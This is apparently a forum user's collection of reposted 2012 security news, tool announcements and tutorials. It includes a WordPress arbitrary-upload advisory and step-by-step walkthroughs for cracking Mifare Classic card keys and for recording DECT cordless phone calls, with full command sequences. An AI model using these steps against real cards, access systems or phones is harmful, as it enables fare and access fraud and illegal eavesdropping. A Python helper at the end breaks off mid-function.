Wubi

Everything posted by Wubi

  1. Malware attack spread as email from your office's HP scanner
     by Graham Cluley on July 24, 2012 | Filed Under: Featured, Malware, Spam

     In these high-tech times, scanners and photocopiers aren't just dumb machines sitting in the corner of the office. They are usually connected to the corporate network, and - in some cases - can even email you at your desk to save you having to wear out your shoe leather.

     And it's precisely this functionality that we have seen cybercriminals exploiting today, pretending that their malicious emails in fact come from an HP scanner inside your organisation.

     Here's a typical example of the emails we have been intercepting at SophosLabs:

     Subject: Re: Scan from a Hewlett-Packard ScanJet 4952740

     Message body:
     Attached document was scanned and sent to you using a Hewlett-Packard I-56919SL.
     SENT BY: SHERRIL
     PAGES: 7
     FILETYPE: .DOC [Word2003 File]

     As you'll see in the next example, the precise wording (the names and numbers used) can vary from email to email. But each of the emails has the same file attached - HP_Document.zip.

     So, what's in the ZIP file?

     hp_page-1-19_24.07.2012.exe

     Clearly that's not a scanned-in image - it's executable code. In fact, it's a Trojan horse called Troj/Agent-XDD, capable of infecting your Windows PC and putting your computer data at risk.

     Here's a list of some of the different subject lines we saw in this spammed-out malware campaign, in just the course of a few seconds:

     We've seen malware spread as scans from HP devices in the past, but there has been a notable wave of malicious code spammed out using the disguise today - so be on your guard.

     If you are one of the many people seeing this malware attack in your email today, please do not click on the attachment even if you are waiting for a scanned-in document to be sent to you. Instead, simply delete the email and your computer will be safe.

     Source: Malware attack spread as email from your office's HP scanner | Naked Security
  2. July 24, 2012 By Black

     Evader can be used to test your organization's network security devices against Advanced Evasion Techniques that are increasingly used in sophisticated and targeted cyber attacks. Evader launches a set of AETs against a tester's own next generation firewall (NGFW), Intrusion Prevention System (IPS) and Unified Threat Management (UTM). As a result, organizations can understand whether these AETs pose a threat to their own networks and digital assets.

     Features of Evader
     - Launch controlled AET-borne attacks at your own defense technology
     - Tweak evasions and combinations, and instantly see if you are successful

     The Evader includes a set of AETs that has gone through the CERT vulnerability coordination process that began two years ago. The purpose of Evader is to provide hard facts about AET readiness of an organization's own security devices, support decision-making and raise an organization's security level.

     Advanced Evasion Techniques (AET)
     - Discovered and reported by Stonesoft since 2007
     - Stealth cyber attack methods that bypass network security
     - Simultaneous execution on multiple protocol layers
     - Capable of changing dynamically during an attack
     - Evasion combinations and modifications
     - Not satisfactorily tested in published security device lab tests

     Despite most security vendors promising 100 percent protection against evasion attacks, hackers are still breaching some of the world's most secure networks using more advanced methods like AETs. AETs are used to attack networks by combining several known evasion methodologies to create a new, previously unknown and dynamically changing technique that is delivered over several layers of a network simultaneously. This allows the attacker to successfully deliver any exploit, malicious payload or code to a target host without detection.

     Download Evader: Evader – Evader

     Source: PenTestIT — Your source for Information Security Related information!
  3. WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload

     EDB-ID: 20083 | CVE: N/A | OSVDB-ID: N/A
     Author: Chris Kellum | Published: 2012-07-24

     # Exploit Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
     # Date: 7/23/12
     # Exploit Author: Chris Kellum
     # Vendor Homepage: http://mondaybynoon.com/
     # Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip
     # Version: 0.5.4.4

     =====================
     Vulnerability Details
     =====================

     Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:

     filename.php.jpg

     Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.

     In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.

     Example: /wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/

     However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.

     ===================
     Disclosure Timeline
     ===================

     7/13/2012 - Vendor notified
     7/23/2012 - Version 0.5.4.6 released
     7/23/2012 - Public disclosure
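     The defensive counterpart to the advisory above, as an added example that is not the advisory's or the Front End Upload plugin's own code: a standalone PHP filename check that refuses exactly the double-extension trick described ("filename.php.jpg"), by testing every dot-separated segment against server-interpreted extensions and requiring the final extension to be on an allow-list. The allow-list and the list of dangerous extensions are assumptions chosen for this example.

```php
<?php
// Added example (not from the advisory or the plugin): reject upload names such as
// "shell.php.jpg" even though the last extension looks harmless.
// Assumption: the allow-list below is illustrative; tune it for the real site.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
// Extensions that common Apache/mod_php setups may interpret when they appear
// anywhere in a multi-extension name (AddHandler matches on any segment).
const DANGEROUS_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar',
    'htaccess', 'cgi', 'pl', 'shtml',
];

/**
 * Returns a sanitized filename to store, or null if the upload must be refused.
 */
function validate_upload_name(string $original): ?string
{
    // Drop directory components a client might smuggle in (either separator).
    $name = basename(str_replace('\\', '/', $original));

    // Refuse empty names, dot-files (.htaccess) and control characters / NUL bytes.
    if ($name === '' || $name[0] === '.' || preg_match('/[\x00-\x1f]/', $name)) {
        return null;
    }

    // Compare case-insensitively: "evil.PHP.png" must be caught as well.
    $parts = explode('.', strtolower($name));
    if (count($parts) < 2) {
        return null;                       // no extension at all
    }

    $ext = array_pop($parts);
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;                       // final extension not on the allow-list
    }

    // Every remaining segment is a hidden extension candidate:
    // "shell.php.jpg" -> parts ["shell", "php"], which must be rejected.
    foreach ($parts as $segment) {
        if (in_array($segment, DANGEROUS_EXTENSIONS, true)) {
            return null;
        }
    }

    // Collapse the base name to a safe character set and keep exactly one extension.
    $base = preg_replace('/[^a-z0-9_-]+/', '_', implode('_', $parts));
    return $base . '.' . $ext;
}

// Constructed sample names for the example; none come from a real upload.
$samples = ['report.pdf', 'photo.jpg', 'shell.php.jpg', '.htaccess', '../evil.PHP.png', 'noext'];
foreach ($samples as $sample) {
    $result = validate_upload_name($sample);
    printf("%-18s -> %s\n", $sample, $result === null ? 'REJECTED' : $result);
}
```

     The name check is only one layer: the advisory's hosts executed .php.jpg because of how the web server maps handlers, so the uploads directory should additionally be served with script execution disabled.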
  4. Description: In this video you will learn how to secure your Linux server using the AIDE tool. This is a live cam recording but an interesting video.

     AIDE: AIDE (Advanced Intrusion Detection Environment) is a file and directory integrity checker. It creates a database from the regular expression rules that it finds in the config file. Once this database is initialized it can be used to verify the integrity of the files. It has several message digest algorithms that are used to check the integrity of the file. All of the usual file attributes can also be checked for inconsistencies. It can read databases from older or newer versions. See the manual pages within the distribution for further info.

     AIDE - Advanced Intrusion Detection Environment

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

     Original Source:
  5. Description: This video is all about HTTPS and SSL, how they work, and the difference between a public key and a private key. For more information about how to configure it etc., please visit this site: Using Client Certificate Authentication with IIS 6.0 Web Sites

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

     Original Source:
  6. Grum botnet briefly revived, killed by authorities yet again

     Summary: Grum, the third largest known botnet, was taken down last week. Those behind Grum attempted to bring it back this week, but security researchers stepped in and put it back into the ground once again.

     By Emil Protalinski for Zero Day | July 24, 2012 -- Updated 13:54 GMT (06:54 PDT)

     Last week, authorities took down Grum, the world's third largest botnet at the time. The cybercriminals responsible for the malicious network attempted to bring it back yesterday, but thankfully officials stepped in and killed it again.

     In the absence of any built-in fallback mechanisms, Grum's botnet herders paid the Ukrainian ISP SteepHost to remove the null route on three Command and Control (C&C) servers. FireEye suspects the cybercriminals paid a large amount of money in order to get access to the servers. After hours of negotiations, FireEye managed to convince SteepHost to shut down the CnCs once more.

     As you can see in the chart above, there was a short burst of spam sent by Grum during this time, but activity has once again been reduced to nothing.

     Grum originally had four C&C servers. First Dutch authorities took down two of the ones in the Netherlands, then the server in Panama fell, and although six new ones were set up in Ukraine, authorities moved quickly to kill those as well as the remaining Russian one. While an attempt was made to bring back some of the Ukrainian servers this week, I think it's safe to say that Grum is as good as gone since the main servers cannot be recovered.

     "A strong warning has been given to SteepHost that if something like this happens again, a complaint will be filed with their upstream provider which might de-peer them off the Internet," a FireEye spokesperson said in a statement. "Alternatively their whole subnet can be blacklisted which could cause some serious damage to their business."

     Source: Grum botnet briefly revived, killed by authorities yet again | ZDNet
  7. Warning: Battery-saver app on Android is malware

     Summary: Cybercriminals have created a fake battery-saving app for Android that is really malware in disguise. The idea is to harvest e-mail addresses for spamming users at a later time.

     By Emil Protalinski for Zero Day | July 24, 2012 -- Updated 13:09 GMT (06:09 PDT)

     A new piece of malware is trying to take advantage of poor battery life on Android smartphones. Cybercriminals have created an app that is supposed to reduce battery use, but in reality steals the user's contacts data stored on the device. Symantec, which first discovered the malware, is calling this particular threat Android.Ackposts. Here's the official description:

     Android.Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location. The Trojan may arrive as a package with the following name: BatteryLong.apk.

     As opposed to using third-party app stores or even the official Google Play store, this app is pushed via Japanese spam e-mail that includes a link to download and install it. Although the messages claim the app reduces battery use by half, the app does nothing to save battery power. It does, however, send the user's contacts data (name, phone number, e-mail address, and more) to an external website for safe keeping.

     As you can see in the screenshot in the top right, this malicious app only requests two permissions when it installs: "Network communication" (to access the Internet and upload the personal data) and "Your personal information" (to read and acquire the user's contacts data in the first place). The developer may have limited the number of required permissions as much as possible to avoid suspicion.

     Once the app is installed and launched, a setup screen appears for a second, followed by a message stating that the device does not support the app. That is when the app steals the user's contacts data in the background.

     The developers of this malicious app are most likely trying to harvest e-mail addresses for spamming purposes. Symantec traced the spam message back to the sender, and discovered that the cybercriminals are also operating various social networking and dating sites already notorious for sending spam.

     Source: Warning: Battery-saver app on Android is malware | ZDNet
  8. July 24, 2012 By Mayuresh

     Our first post regarding ModSecurity can be found here. A few hours ago, an update – ModSecurity version 2.6.7 – was released.

     "ModSecurity is an open source, free web application firewall (WAF) Apache module, that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis. ModSecurity employs the following security models:

     - Negative Security Model – looks for known bad, malicious requests. This method is effective at blocking a large number of automated attacks, however it is not the best approach for identifying new attack vectors. Using too many negative rules may also negatively impact performance.
     - Positive Security Model – When a positive security model is deployed, only requests that are known to be valid are accepted, with everything else rejected. This approach works best with applications that are heavily used but rarely updated.
     - Virtual Patching – Its rule language makes ModSecurity an ideal external patching tool. External patching is all about reducing the window of opportunity. Time needed to patch application vulnerabilities often runs to weeks in many organizations. With ModSecurity, applications can be patched from the outside, without touching the application source code (and even without any access to it), making your systems secure until a proper patch is produced.
     - Extrusion Detection Model – ModSecurity can also monitor outbound data and identify and block information disclosure issues such as leaking detailed error messages or Social Security Numbers or Credit Card Numbers."

     Official ModSecurity 2.6.7 change log:
     - Fixed Perl Compatible Regular Expressions (PCRE) mismatch version warning message (Thanks Victor Julien).
     - Fixed explicit target replacement using SecUpdateTargetById was broken.
     - The ctl:ruleUpdateTargetById is deprecated and will be removed in future versions since there is no safe way to use it per-request.
     - Added ctl:ruleRemoveTargetById that can be used to exclude targets to be processed per-request.

     Download ModSecurity: ModSecurity 2.6.7 – modsecurity-apache_2.6.7.tar.gz

     Source: PenTestIT — Your source for Information Security Related information!
  9. Description: In this video you will learn what footprinting is, why we use footprinting, etc. You will also learn how to start scanning a website and gather information about that website or network.

     Footprinting: In simple language, footprinting is gathering information about a computer and system, that is a web server or any kind of system. You can perform lots of security techniques like port scanning, OS detection, spidering on the web, etc.

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

     Original Source:
  10. Description: In this video Liz Vonderheiden (CISSP) is talking about cryptography. In this lecture she will talk about topics like what crypto is, what the crypto components are and what security services are offered, etc. This is a very good video for those who don't understand cryptography, and you can start learning crypto after watching this video :)

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

     Original Source:
  11. July 24, 2012 By Mayuresh

     Time to update your Wireshark installations as the world's most popular network protocol analyzer now has an update – Wireshark version 1.8.1 (stable)!

     "Wireshark is the world's most popular network protocol analyzer. It is used for troubleshooting, analysis, development, and education."

     Wireshark 1.8.1 official change log:

     Bug Fixes

     The following bugs have been fixed:
     - Wireshark crashes on bootp filter. (Bug 7391)
     - Wireshark > 1.4 does not correctly read Association ID for PS Poll packets. (Bug 7429)
     - Radius-EAP broken since 1.8.0 release. (Bug 7430)
     - SNMP incorrectly marks SNMPv3 "discovery" packet as malformed. (Bug 7438)
     - Widgets are not properly expanded in GTK3. (Bug 7377)
     - Find Next Mark duplicated on Edit Menu. (Bug 7445)
     - DVB-CI/CI+: fix offset error in operator_info apdu. (Bug 7468)
     - Unable to correctly identify IEC 61850 MMS packets. (Bug 7488)
     - WinPcap doesn't install if vcredist_x64 requires reboot. (Bug 7507)

     The following vulnerabilities have been fixed:
     - wnpa-sec-2012-11: The PPP dissector could crash. (Debian bug 680056) Versions affected: 1.4.0 to 1.4.13, 1.6.0 to 1.6.8, 1.8.0.
     - wnpa-sec-2012-12: The NFS dissector could use excessive amounts of CPU. (Bug 7436) Versions affected: 1.4.0 to 1.4.13, 1.6.0 to 1.6.8, 1.8.0.

     Updated Protocol Support: BACapp, BOOTP, DCERPC SPOOLSS, DVB-CI, H.248, IEEE 802.11, Jmirror, NAS EPS, NFS, PPP, RELOAD Framing, SES, SNMP, XMPP

     New and Updated Capture File Support: Microsoft Network Monitor

     Download Wireshark: Wireshark 1.8.1 – Wireshark-win64-1.8.1.exe / wireshark-1.8.1.tar.bz2

     Source: Wireshark version 1.8.1! — PenTestIT
  12. July 24, 2012 By Mayuresh

     Our first post regarding OWASPBWA or the OWASP Broken Web Applications Project can be found here. A few hours ago, an updated version – OWASPBWA version 1.0 – was released!

     "Open Web Application Security Project (OWASP) Broken Web Applications Project or OWASPBWA is a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost VMware Player and VMware Server products (along with their commercial products)."

     Official OWASPBWA 1.0 change log:
     - Added new application: WIVET (wivet - Web Input Vector Extractor Teaser - Google Project Hosting)
     - Updated WAVSEP, Mutillidae, Vicnum
     - Created new category for "Applications for Testing Tools", containing OWASP ZAP WAVE, WIVET, and WAVSEP
     - Major update to User Guide at UserGuide - owaspbwa - User Guide for the OWASP BWA VM. - OWASP Broken Web Applications Project - Google Project Hosting.
     - Removed some other project Wiki pages that were incorporated into User Guide.
     - More improvements to index.html

     Download OWASPBWA: OWASPBWA 1.0 – OWASP_Broken_Web_Apps_VM_1.0.zip / OWASP_Broken_Web_Apps_VM_1.0.7z

     Both files contain the same VM! Just that .7zip is smaller in size.

     Source: OWASPBWA version 1.0! — PenTestIT
  13. This article was contributed by MI1.
     URL: Hack 4 Fun | Twitter | Email: fblubr@gmail.com

     RFID Cooking with Mifare Classic

     DISCLAIMER: The information and reference implementation is provided:
     - For informational use only as part of academic or research study, especially in the field of informational security, cryptography and secure systems
     - As-is without any warranty, support or liability - any damages or consequences obtained as a result of consulting this information are purely on the side of the reader
     - NOT to be used in illegal circumstances (for example to abuse, hack or trick a system which the reader does not have specific authorizations to, such as ticketing systems, public transport, University/ISIC cards, building access systems or whatsoever systems using Mifare Classic as core technology)

     NOTES: This article contains no original research. All the research and implementation was made by other people and communities and is publicly available. We made this two cents just for fun and because we love BackTrack. This is not an A-Z guide so try harder!

     0x00 - Preface

     Some of you may have read that the proprietary symmetric key cryptographic algorithm of the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical access control systems (PACS) and contactless payment systems (including tollway and public transportation systems). By some estimates, there are 500 million MIFARE cards deployed worldwide, and the majority of them are MIFARE Classic cards.

     Mifare Classic is an inexpensive, entry-level chip, based on ISO/IEC 14443 Type A, 1kB or 4kB. It uses the 13.56 MHz contactless smartcard standard, proprietary CRYPTO1 with 48-bit keys. There is no protection against cloning or modifications. Anyone with a 50 € reader can use this weakness against your infrastructure. At least one sector is always encrypted with a default key. After cracking all keys, hackers are able to change name, student's university number, expiration date... This cookbook is a proof of concept of how easily that can be done.

     Chosen ingredients: BackTrack | Touchatag starter package
     Tested on: BackTrack 4 R2, BackTrack 5 Final (32bit)

     Dependencies

     root@bt:~# apt-get install flex libpcsclite-dev libusb-dev checkinstall

     0x01 - Hardware

     Touchatag - ACR122U

     Touchatag is an ACS ACR122(U) NFC Reader USB RFID reader. The USB reader works at 13.56 MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when used with the Touchatag RFID tags. This product is made by Advanced Card Systems Limited and seems to be available in different layouts but the hardware doesn't differ so much. They are all using a PN532 NFC Controller chip and an ST7 microcontroller unit.

     0x02 - Software

     ACR122U driver

     root@bt:~# wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
     root@bt:~# unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
     root@bt:~# cd acr122u
     root@bt:~# tar -jxvf acsccid-1.0.2.tar.bz2
     root@bt:~# cd acsccid-1.0.2
     root@bt:~# ./configure
     root@bt:~# make
     root@bt:~# checkinstall -D -y --install

     Open Source Near Field Communication (NFC) Library /LIBNFC/

     Libnfc is the first free NFC SDK and Programmers API released under the GNU Lesser General Public License.

     root@bt:~# apt-get install -y debhelper libtool && wget http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz
     root@bt:~# tar xfvz libnfc-1.4.2.tar.gz && cd libnfc-1.4.2
     root@bt:~# svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian
     root@bt:~# dpkg-buildpackage -rfakeroot
     root@bt:~# dpkg -i ../libnfc*.deb

     Check your reader / target with nfc-list.

     root@bt:~# nfc-list
     nfc-list use libnfc 1.4.2 (r891)
     Connected to NFC device: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07)
     1 ISO14443A passive target(s) was found:
         ATQA (SENS_RES): 00 02
         UID (NFCID1): xx xx xx xx
         SAK (SEL_RES): 18

     If your reader is rejected because of the firmware (log message: "Firmware (x.y) is bogus!") just disable version checking. All you need to do is change ifdDriverOptions (line 55 in Info.plist) to skip version checking like this:

     root@bt:~# nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist
     ifdDriverOptions 0x0005

     Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and ready.

     MFOC - Mifare Classic Offline Cracker

     Mifare Classic Offline Cracker is a tool that can recover keys from Mifare Classic cards. Thanks to Norbert Szetei and Pavol Luptak for their attack's implementation. MFOC is a utility to compute (crack) all keys (A and B) to all sectors, providing at least one of the keys is already known. Keys file is the file where mfoc will store cracked keys. The format of that file is compatible with nfc-mfclassic, so you can then use it to dump the card into a file, or write a dump onto the card.

     root@bt:~# wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar -xvzf mfoc-0.10.2.tar.gz
     root@bt:~# cd mfoc-0.10.2
     root@bt:~# autoreconf -vis
     root@bt:~# ./configure
     root@bt:~# make
     root@bt:~# checkinstall -D -y --install

     0x03 - Dumping & Cooking

     pcscd coordinates the loading of drivers for card readers. It allows applications to access smart cards and readers without knowing details of the card or reader. It is a resource manager that coordinates communications with smart card readers and smart cards and cryptographic tokens that are connected to the system. I prefer to start pcscd in the foreground (no daemon) with pcscd -f. Then it's time to start mfoc. Use a high number of probes, because the default number of probes for a key recovery for one sector is 20. The whole cracking could take from 30 minutes to 30 hours. You can also use the -k key parameter to add a key to the list of known keys, which is tried against your card in the initial phase. The -k option somehow didn't work for me, so I always compile my known keys directly into mfoc.c. Search for "Array with default Mifare Classic keys". Not sure about other countries, but in the country where I live the keys are the same. Once you have keys from all sectors, you should be able to use RFID-Fu against other cards, which is epic fail.

     root@bt:~# nfc-mfclassic --help
     Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]
       r|w           - Perform read from (r) or write to (w) card
       a|b           - Use A or B keys for action
       <dump.mfd>    - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
       <keys.mfd>    - MiFare Dump (MFD) that contain the keys (optional)
     Or: nfc-mfclassic x <dump.mfd> <payload.bin>
       x             - Extract payload (data blocks) from MFD
       <dump.mfd>    - MiFare Dump (MFD) that contains wanted payload
       <payload.bin> - Binary file where payload will be extracted

     Keep in mind that the card UID will not be affected (not changed) by this process. Buy some blank card or Proxmark III if that is what you want.

     If you are now thinking about dumping your electronic wallet right after recharge and, when the credit comes to zero, writing the content back, then please don't do it. What can stop you from doing that? Well, probably only your conscience, but if the card gets blocked 24 hours after first use then don't complain. Yes, there are online checking and billing systems out there for basic cards.

     0x04 – ISIC Issue

     With ISIC - International Student Identity Card - an attacker can abuse around ten services, not only one. ISIC cards are widely used for entrance, transportation, dining payments and various other services or discounts. According to the homepage there are 4.5 million cardholders in 120 countries. Cards should be replaced with more secure types ASAP. It is possible to do much more than that, but sufficient for demonstration, let's play a little...

     At some universities, there is only one entry security check – ISIC. As you can see this is trivial to bypass. We did many tests with public transportation systems and with university systems. Results are all the same – those systems are easily hackable.

     0x06 – Conclusion

     Finally, when will people learn their lesson? Cryptographic algorithms should be public so that they can be scrutinized and tested. Secret algorithms aren't more valuable because they are secret. Anyone needing a highly secure smart card should make sure there's layered security and not just depend on the chip's encryption.

     0x07 – What's next?

     Since I have access to a Proxmark III, which is a universal RFID hacking tool that can be used for 100% accurate cloning (even UID), I may once write a second edition about c00king with Mifare Classic and HID Prox... Arming BackTrack with a GSM attack suite?

     0x08 – Thanks

     This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back.

     0x09 – References & Links

     For further reading about this topic please see the following:
     - http://www.cs.virginia.edu/~kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf
     - 24C3: Mifare
     - http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf
     - http://www.nethemba.com/mifare-classic-slides.pdf
     - mfoc - nfc-tools - Mifare Classic Offline Cracker - Near Field Communication (NFC) tools under POSIX systems - Google Project Hosting

     0x0A - About

     MI1 is a "full time security enthusiast" with a university degree in the field of informatics. Recently focusing his passion on USRP and RFID stuff.

     Source: RFID Cooking with Mifare Classic - BackTrack Linux
  14. This article was contributed by 5M7X. URL : Back-Track.de - German Community Twitter: Twitter Email : 5M7X@mail.ru BIG FAT HAIRY WARNING: IT IS ILLEGAL TO RECORD PHONE CONVERSATIONS IN MANY COUNTRIES. For a list of state privacy laws in the US, check State Privacy LawsState Privacy Laws and http://fjallfoss.fcc.gov/edocs_public/attachmatch/DOC-266204A1.pdf. Contents 1 What is DECT? 1.1 The problem? 1.2 Tested on 2 Installing dedected 2.1 Install from repository 2.2 Install from source 3 Install some additional tools 4 Load the drivers 5 Scan for fixed parts a.k.a. fp (DECT base stations) 6 Ignore phones you don’t want to sniff (e.g. your neighbours!) 7 Record the phone call 8 Decode the call out of the datastream 9 Import the streams into audacity and listen to the calls 10 Clean up / Reload 11 DECT protocol 12 Video: Sniffing DECT phones with BackTrack 5 What is DECT? Digital Enhanced Cordless Telecommunications - Wikipedia, the free encyclopedia The problem? Most vendors don’t implement encryption in their devices so one can sniff it with certain hardware and software. For a previous post on the topic, check: http://www.offensive-security.com/backtrack/sniffing-dect-phones-the-details/ Tested on BackTrack 5 final x86 KDE with kernel 2.6.38 Original Dosch&Amand Type II PCMCIA Card SIEMENS C1 DECT Phones set up in repeater mode NOTE: This is experimental software which is not very actively supported anymore! Installing dedected In order to get dedected installed on BackTrack, you have the choice between: Use dedected from the BackTrack 5 repositories. Compile it on your own if you want to experiment. Install from repository root@bt:~# [COLOR="#FF0000"]apt-get update[/COLOR] root@bt:~# [COLOR="#FF0000"]apt-get install dedected[/COLOR] Install from source This stage is optional for those wanting to build the tools from source code. 
root@bt:~# [COLOR="#FF0000"]prepare-kernel-sources[/COLOR]
root@bt:~# [COLOR="#FF0000"]cd /usr/src/linux[/COLOR]
root@bt:~# [COLOR="#FF0000"]cp -rf include/generated/* include/linux/[/COLOR]
root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony[/COLOR]
root@bt:~# [COLOR="#FF0000"]svn co https://dedected.org/svn/trunk dedected_svn[/COLOR]
root@bt:~# [COLOR="#FF0000"]cd dedected_svn/com-on-air_cs-linux/[/COLOR]
root@bt:~# [COLOR="#FF0000"]make && make -C tools[/COLOR]

(The svn checkout above lands in /pentest/telephony/dedected_svn; the paths below use the dedected directory that ships with BackTrack. If you built from the checkout, substitute dedected_svn in the cd commands.)

Install some additional tools:

root@bt:~# [COLOR="#FF0000"]apt-get -y install audacity[/COLOR]

Load the drivers:

root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR]
root@bt:~# [COLOR="#FF0000"]make node[/COLOR]

If you have not yet inserted your Dosch & Amand Type 2 or Type 3 or Voo:doo PCMCIA card, do so now. Next, load the driver:

root@bt:~# [COLOR="#FF0000"]make load[/COLOR]

Scan for fixed parts, a.k.a. FP (DECT base stations):

root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux/tools[/COLOR]
root@bt:~# [COLOR="#FF0000"]./dect_cli[/COLOR]

If you need info on the usage, type "help". If you live in the U.S., switch to the US/DECT 6 band via the "band" command.

Enable some verbosity:

[COLOR="#008080"]verb[/COLOR]

And start scanning for base stations:

[COLOR="#008080"]fpscan[/COLOR]

After scanning 2-3 times through all channels, disable verbosity and stop scanning:

[COLOR="#008080"]verb[/COLOR]
[COLOR="#008080"]stop[/COLOR]

Ignore the phones you don't want to sniff (e.g. your neighbours')

Start a callscan:

[COLOR="#008080"]callscan[/COLOR]

Now grab your DECT handset, make a test phone call and wait until you see the call. It is also sufficient if you just get a dialling tone. You should see something like:

### found new call on 00 82 31 33 73 on channel 7 RSSI 34

[COLOR="#008080"]stop[/COLOR]

Name your base station if you want:

[COLOR="#008080"]name 00 82 31 33 73 stallowned[/COLOR]

Dump all found phones:

[COLOR="#008080"]dump[/COLOR]

Ignore every other phone except yours via the following command. IMPORTANT!

[COLOR="#008080"]ignore 01 30 95 13 37[/COLOR]

Record the phone call

Start automatic recording of every phone call it detects:

[COLOR="#008080"]autorec[/COLOR]

Now grab your DECT handset and make a test call. I recommend calling a "time telling service" that can be reached over a normal phone number. You should get something like this:

### starting autorec
### stopping DIP
### starting callscan
### trying to sync on 00 82 ab b0 29
### got sync
### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
### stopping DIP

After you hang up, the dumping should stop.

Decode the call out of the data stream

Stop the autorec:

[COLOR="#008080"]stop[/COLOR]

Decode the audio stream out of the raw dump:

root@bt:~# [COLOR="#FF0000"]./decode.sh[/COLOR]

Import the streams into Audacity and listen to the calls

Start Audacity via "alt + f2", then type "audacity" and press enter. Import the fixed-part and the portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via File -> Import -> Audio or simply "ctrl + shift + I". Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav. Play your phone call with the play button.

Hint: if you can only hear noise, your phone seems to use some encoding/encryption. You can enable the repeater mode in your telephone so that it disables encryption, and then test whether your setup is working properly.

Clean up / Reload

If you need to reload the drivers:

root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR]
root@bt:~# [COLOR="#FF0000"]make reload[/COLOR]

If you're finished and want to clean up:

root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR]
root@bt:~# [COLOR="#FF0000"]make unload[/COLOR]
root@bt:~# [COLOR="#FF0000"]rm /dev/coa[/COLOR]

DECT protocol

If you are interested in more details of the protocol, you can open the .pcap file in Wireshark.

Video: Sniffing DECT phones with BackTrack 5
http://player.vimeo.com/video/25027253

Source: http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected
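The script below is an added helper, not part of the dedected project or of the BackTrack wiki page above. It parses the lines dect_cli prints during callscan and autorec in the format shown above ("### found new call on ...", "### trying to sync on ..." and the RFPI embedded in the dump filename) and emits the ignore commands for every RFPI except your own base station(s), so the "ignore every other phone" step cannot be forgotten. The sample log is constructed; the output format of the dump command is not shown on the page, so it is not parsed.

```python
import re

# An RFPI as dect_cli prints it: five hex bytes separated by spaces.
_RFPI = r"((?:[0-9a-f]{2} ){4}[0-9a-f]{2})"
CALL_RE = re.compile(r"### found new call on " + _RFPI + r" on channel (\d+) RSSI (\d+)", re.I)
SYNC_RE = re.compile(r"### trying to sync on " + _RFPI, re.I)
DUMP_RE = re.compile(r"RFPI_((?:[0-9a-f]{2}_){4}[0-9a-f]{2})\.pcap", re.I)


def normalize_rfpi(text):
    """Accept '00 82 31 33 73', '00:82:31:33:73', '00_82_31_33_73' or '0082313373'."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", text).lower()
    if len(hexdigits) != 10:
        raise ValueError("not a 5-byte RFPI: %r" % text)
    return " ".join(hexdigits[i:i + 2] for i in range(0, 10, 2))


def parse_log(lines):
    """Collect every RFPI dect_cli mentioned, with channel/RSSI from the callscan lines."""
    seen = {}
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            entry = seen.setdefault(normalize_rfpi(m.group(1)),
                                    {"calls": 0, "channel": None, "rssi": None})
            entry["calls"] += 1
            entry["channel"], entry["rssi"] = int(m.group(2)), int(m.group(3))
            continue
        m = SYNC_RE.search(line) or DUMP_RE.search(line)
        if m:
            seen.setdefault(normalize_rfpi(m.group(1)),
                            {"calls": 0, "channel": None, "rssi": None})
    return seen


def ignore_commands(lines, own_rfpis):
    """dect_cli 'ignore' commands for every base station except the ones you own."""
    own = {normalize_rfpi(r) for r in own_rfpis}
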